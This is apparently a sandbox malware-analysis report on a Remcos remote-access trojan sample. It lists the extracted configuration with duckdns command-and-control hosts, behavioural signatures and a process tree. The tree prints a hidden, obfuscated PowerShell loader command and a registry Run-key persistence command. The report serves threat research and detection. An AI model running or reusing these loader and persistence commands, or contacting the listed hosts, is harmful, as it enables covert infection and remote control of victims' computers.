Analysis
-
max time kernel
210s -
max time network
210s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16/01/2025, 08:47
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://www.sendgb.com/src/download_one.php?uploadId=XRe6kNMAcgW&sc=b29a7fb0f99e7316d6fef858df464c88&file=DOCUMET7887RAMADA%40%23%24%40%21.LZH&private_id=
Resource
win10v2004-20241007-en
General
Malware Config
Extracted
remcos
Sent
haleleeh8iuoty1.duckdns.org:8347
haleleeh8iuoty1.duckdns.org:37830
haleleeh8iuoty2.duckdns.org:8347
haleleeh8iuoty3.duckdns.org:8347
haleleeh8iuoty4.duckdns.org:8347
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
true
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
kmirtup.dat
-
keylog_flag
false
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
aksoetuise-Y9DD4X
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
- startup_value
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 5096 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 4232 DOCUMET7887RAMADA@#$@!.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bemixt = "%Teknologiseringerne% -windowstyle 1 $Graensefunktion=(Get-Item 'HKCU:\\Software\\Genindlggelsen\\').GetValue('Pvc');%Teknologiseringerne% ($Graensefunktion)" reg.exe -
Blocklisted process makes network request 7 IoCs
flow pid Process 67 2436 msiexec.exe 69 2436 msiexec.exe 71 2436 msiexec.exe 73 2436 msiexec.exe 76 2436 msiexec.exe 79 2436 msiexec.exe 81 2436 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 66 drive.google.com 67 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2436 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 5096 powershell.exe 2436 msiexec.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Common Files\deistic.ini DOCUMET7887RAMADA@#$@!.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\resources\bumpee\Ressourcekrvende.lnk DOCUMET7887RAMADA@#$@!.exe File opened for modification C:\Windows\Fonts\sluttishly\nonfeverish.tin DOCUMET7887RAMADA@#$@!.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DOCUMET7887RAMADA@#$@!.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
NSIS installer 2 IoCs
resource yara_rule behavioral1/files/0x0009000000023c97-132.dat nsis_installer_1 behavioral1/files/0x0009000000023c97-132.dat nsis_installer_2 -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings msedge.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1268 reg.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
pid Process 3364 msedge.exe 3364 msedge.exe 4836 msedge.exe 4836 msedge.exe 1760 identity_helper.exe 1760 identity_helper.exe 1908 msedge.exe 1908 msedge.exe 4392 msedge.exe 4392 msedge.exe 4392 msedge.exe 4392 msedge.exe 5096 powershell.exe 5096 powershell.exe 5096 powershell.exe 5096 powershell.exe 5096 powershell.exe 5096 powershell.exe 5096 powershell.exe 5096 powershell.exe 5096 powershell.exe 5096 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1096 7zG.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 5096 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs
pid Process 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe -
Suspicious use of AdjustPrivilegeToken 33 IoCs
description pid Process Token: SeRestorePrivilege 1624 7zG.exe Token: 35 1624 7zG.exe Token: SeSecurityPrivilege 1624 7zG.exe Token: SeSecurityPrivilege 1624 7zG.exe Token: SeRestorePrivilege 1420 7zG.exe Token: 35 1420 7zG.exe Token: SeSecurityPrivilege 1420 7zG.exe Token: SeSecurityPrivilege 1420 7zG.exe Token: SeDebugPrivilege 5096 powershell.exe Token: SeIncreaseQuotaPrivilege 5096 powershell.exe Token: SeSecurityPrivilege 5096 powershell.exe Token: SeTakeOwnershipPrivilege 5096 powershell.exe Token: SeLoadDriverPrivilege 5096 powershell.exe Token: SeSystemProfilePrivilege 5096 powershell.exe Token: SeSystemtimePrivilege 5096 powershell.exe Token: SeProfSingleProcessPrivilege 5096 powershell.exe Token: SeIncBasePriorityPrivilege 5096 powershell.exe Token: SeCreatePagefilePrivilege 5096 powershell.exe Token: SeBackupPrivilege 5096 powershell.exe Token: SeRestorePrivilege 5096 powershell.exe Token: SeShutdownPrivilege 5096 powershell.exe Token: SeDebugPrivilege 5096 powershell.exe Token: SeSystemEnvironmentPrivilege 5096 powershell.exe Token: SeRemoteShutdownPrivilege 5096 powershell.exe Token: SeUndockPrivilege 5096 powershell.exe Token: SeManageVolumePrivilege 5096 powershell.exe Token: 33 5096 powershell.exe Token: 34 5096 powershell.exe Token: 35 5096 powershell.exe Token: 36 5096 powershell.exe Token: SeRestorePrivilege 1096 7zG.exe Token: 35 1096 7zG.exe Token: SeSecurityPrivilege 1096 7zG.exe -
Suspicious use of FindShellTrayWindow 37 IoCs
pid Process 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 1624 7zG.exe 1624 7zG.exe 1420 7zG.exe 1096 7zG.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe 4836 msedge.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3228 OpenWith.exe 2436 msiexec.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4836 wrote to memory of 752 4836 msedge.exe 83 PID 4836 wrote to memory of 752 4836 msedge.exe 83 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 4656 4836 msedge.exe 84 PID 4836 wrote to memory of 3364 4836 msedge.exe 85 PID 4836 wrote to memory of 3364 4836 msedge.exe 85 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86 PID 4836 wrote to memory of 1872 4836 msedge.exe 86
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://www.sendgb.com/src/download_one.php?uploadId=XRe6kNMAcgW&sc=b29a7fb0f99e7316d6fef858df464c88&file=DOCUMET7887RAMADA%40%23%24%40%21.LZH&private_id=1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4836 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff409346f8,0x7fff40934708,0x7fff409347182⤵PID:752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2016 /prefetch:22⤵PID:4656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2464 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:3364
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:82⤵PID:1872
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:12⤵PID:2256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:12⤵PID:5076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4980 /prefetch:82⤵PID:4412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4980 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1760
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:12⤵PID:2940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:12⤵PID:5024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:12⤵PID:3544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:12⤵PID:2732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5540 /prefetch:82⤵PID:4384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4816 /prefetch:12⤵PID:4632
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5620 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1620 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:4392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:12⤵PID:5028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2308 /prefetch:12⤵PID:2684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:12⤵PID:2420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=904 /prefetch:12⤵PID:2288
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5960 /prefetch:12⤵PID:412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3976 /prefetch:12⤵PID:2488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1948 /prefetch:12⤵PID:2972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2576 /prefetch:12⤵PID:4652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6260 /prefetch:12⤵PID:3552
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6484 /prefetch:82⤵PID:2068
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2164
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:556
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4184
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\DOCUMET7887RAMADA@#$@!\" -spe -an -ai#7zMap8703:106:7zEvent96551⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1624
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\DOCUMET7887RAMADA@#$@!\DOCUMET7887RAMADA@#$@!\" -spe -an -ai#7zMap22166:152:7zEvent63221⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1420
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\DOCUMET7887RAMADA@#$@!\DOCUMET7887RAMADA@#$@!\dendropogon.txt1⤵PID:4252
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3228
-
C:\Users\Admin\Downloads\DOCUMET7887RAMADA@#$@!\DOCUMET7887RAMADA@#$@!.exe"C:\Users\Admin\Downloads\DOCUMET7887RAMADA@#$@!\DOCUMET7887RAMADA@#$@!.exe"1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4232 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Dynamik=GC -raw 'C:\Users\Admin\AppData\Roaming\Brixvold\reclusely\Krieker213.Fla';$balsal=$Dynamik.SubString(57497,3);.$balsal($Dynamik)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:5096 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2436 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bemixt" /t REG_EXPAND_SZ /d "%Teknologiseringerne% -windowstyle 1 $Graensefunktion=(Get-Item 'HKCU:\Software\Genindlggelsen\').GetValue('Pvc');%Teknologiseringerne% ($Graensefunktion)"4⤵
- System Location Discovery: System Language Discovery
PID:2352 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bemixt" /t REG_EXPAND_SZ /d "%Teknologiseringerne% -windowstyle 1 $Graensefunktion=(Get-Item 'HKCU:\Software\Genindlggelsen\').GetValue('Pvc');%Teknologiseringerne% ($Graensefunktion)"5⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:1268
-
-
-
-
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" h -scrcSHA256 -i#7zMap32440:152:7zEvent183471⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1096
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
854B
MD5e935bc5762068caf3e24a2683b1b8a88
SHA182b70eb774c0756837fe8d7acbfeec05ecbf5463
